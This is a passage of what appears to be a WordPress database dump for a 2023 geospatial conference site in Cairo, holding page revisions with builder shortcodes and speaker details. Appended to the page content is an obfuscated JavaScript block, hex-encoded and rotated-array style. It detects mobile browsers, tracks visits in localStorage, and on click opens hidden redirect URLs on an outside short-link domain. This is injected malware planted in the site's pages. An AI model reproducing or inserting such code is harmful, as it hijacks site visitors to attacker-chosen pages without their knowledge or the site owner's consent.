_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:25:10','2022-10-06 19:25:10','',2167,'https://gsw2023.com/?p=2319',0,'revision','',0),
(2320,1,'2022-10-06 19:27:56','2022-10-06 19:27:56','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"REGISTRATION FEES \" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665116627203{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]More Information[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 